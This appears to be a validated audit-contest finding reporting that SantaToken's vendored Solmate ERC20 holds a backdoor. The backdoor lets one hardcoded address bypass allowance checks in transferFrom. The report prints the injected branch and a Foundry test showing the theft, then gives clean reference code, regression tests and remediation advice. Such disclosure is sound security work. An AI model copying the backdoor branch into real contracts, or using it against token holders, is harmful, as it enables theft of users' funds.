Submission Details
Severity: high
Valid

SantaToken uses malicious ERC-20 implementation

Summary

Malicious code was inserted into the original Solmate ERC20.sol file. This code allows an attacker to transfer tokens to themselves from other users' wallets.

Vulnerability Details

The following piece of code was injected into the transferFrom function:

// hehehe :)
// https://arbiscan.io/tx/0xd0c8688c3bcabd0024c7a52dfd818f8eb656e9e8763d0177237d5beb70a0768d
// Backdoor: when the hardcoded address is the caller, the balances are moved
// directly and the allowance check that every other caller must pass is bypassed.
if (msg.sender == 0x815F577F1c1bcE213c012f166744937C889DAF17) {
    balanceOf[from] -= amount;
    unchecked {
        balanceOf[to] += amount;
    }
    emit Transfer(from, to, amount);
    return true;
}

The following Foundry test confirms that this kind of attack works as described:

function testMaliciousTransferFrom() public {
    // SantaToken.mint() mints 1e18 tokens
    uint256 expectedUserBalanceAfterMint = 1e18;
    // Mint tokens for the user
    vm.prank(address(santasList));
    santaToken.mint(user);
    // Verification that the correct number of tokens have been minted.
    assertEq(santaToken.balanceOf(user), expectedUserBalanceAfterMint);
    // Bad actor tries to steal user's tokens without any approval
    address maliciousERC20Creator = 0x815F577F1c1bcE213c012f166744937C889DAF17;
    vm.prank(maliciousERC20Creator);
    santaToken.transferFrom(user, maliciousERC20Creator, expectedUserBalanceAfterMint);
    // Attacker has obtained tokens from the user
    assertEq(santaToken.balanceOf(maliciousERC20Creator), expectedUserBalanceAfterMint);
    assertEq(santaToken.balanceOf(user), 0);
}

The message left on the blockchain in the linked transaction decodes to "I am going to hack Santas Token!". The author of the SantasList contract (see the comment on line 55 of the file) has the same address as this bad actor.
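For comparison, here is the allowance-checking path that the injected branch bypasses, together with a Foundry regression test that fails as long as the backdoor is present. This is an added example, not code from the SantaToken project or from Solmate: CleanERC20 reproduces the allowance logic of the upstream Solmate transferFrom, while MintableToken, its mint(address) helper and the fixture names (santasList, user, spender) are constructed stand-ins for the project's own contracts.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.13;

// Added example, not the SantaToken project's code. CleanERC20 mirrors the
// allowance logic of upstream Solmate; MintableToken and the fixture are constructed.
import {Test} from "forge-std/Test.sol";

contract CleanERC20 {
    mapping(address => uint256) public balanceOf;
    mapping(address => mapping(address => uint256)) public allowance;

    event Transfer(address indexed from, address indexed to, uint256 amount);
    event Approval(address indexed owner, address indexed spender, uint256 amount);

    function approve(address spender, uint256 amount) public returns (bool) {
        allowance[msg.sender][spender] = amount;
        emit Approval(msg.sender, spender, amount);
        return true;
    }

    // Same shape as upstream Solmate: no caller is exempt from the allowance check.
    function transferFrom(address from, address to, uint256 amount) public virtual returns (bool) {
        uint256 allowed = allowance[from][msg.sender]; // saves gas for limited approvals
        // With no approval, allowed == 0 and this subtraction reverts (checked arithmetic).
        if (allowed != type(uint256).max) allowance[from][msg.sender] = allowed - amount;
        balanceOf[from] -= amount;
        unchecked {
            balanceOf[to] += amount; // cannot overflow: total supply fits in uint256
        }
        emit Transfer(from, to, amount);
        return true;
    }
}

// Constructed stand-in for SantaToken: mint(address) issues 1e18 tokens, as in the report's test.
contract MintableToken is CleanERC20 {
    address public immutable minter;

    constructor(address minter_) {
        minter = minter_;
    }

    function mint(address to) external {
        require(msg.sender == minter, "not minter");
        balanceOf[to] += 1e18;
        emit Transfer(address(0), to, 1e18);
    }
}

contract TransferFromRegressionTest is Test {
    MintableToken token;
    address santasList;
    address user;
    // Address hardcoded in the backdoor, taken from the report.
    address constant backdoorAddress = 0x815F577F1c1bcE213c012f166744937C889DAF17;

    function setUp() public {
        santasList = makeAddr("santasList");
        user = makeAddr("user");
        token = new MintableToken(santasList);
        vm.prank(santasList);
        token.mint(user);
    }

    // Regression test: the formerly privileged address must fail like any other caller.
    function testBackdoorAddressCannotTransferWithoutApproval() public {
        vm.prank(backdoorAddress);
        vm.expectRevert(); // arithmetic underflow in the allowance update
        token.transferFrom(user, backdoorAddress, 1e18);
        assertEq(token.balanceOf(user), 1e18);
        assertEq(token.balanceOf(backdoorAddress), 0);
    }

    // Sanity check: ordinary approved transfers keep working once the branch is removed.
    function testApprovedTransferFromSucceeds() public {
        address spender = makeAddr("spender");
        vm.prank(user);
        token.approve(spender, 4e17);
        vm.prank(spender);
        token.transferFrom(user, spender, 4e17);
        assertEq(token.balanceOf(user), 6e17);
        assertEq(token.balanceOf(spender), 4e17);
        assertEq(token.allowance(user, spender), 0);
    }
}
```

Run with `forge test --match-contract TransferFromRegressionTest`. Pointing the regression test at the real SantaToken instead of the constructed MintableToken turns it into a permanent guard against the same branch being reintroduced in a vendored dependency.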

Impact

High. The hardcoded address can move any holder's tokens without approval, so the probability of a rug pull is very high.

Tools Used

Manual review.

Recommendations

Remove the malicious piece of code. Import dependencies only from verified sources, e.g. the official Solmate repository.

Updates

Lead Judging Commences

inallhonesty Lead Judge almost 2 years ago
Submission Judgement Published
Validated
Assigned finding tags:

unauthorized elf wallet approval in solmate-bad

Some sneaky elf has changed this library to a corrupted one where his wallet address skips all the approval checks for SantaToken! Shenanigans here - https://github.com/PatrickAlphaC/solmate-bad/blob/c3877e5571461c61293503f45fc00959fff4ebba/src/tokens/ERC20.sol#L88
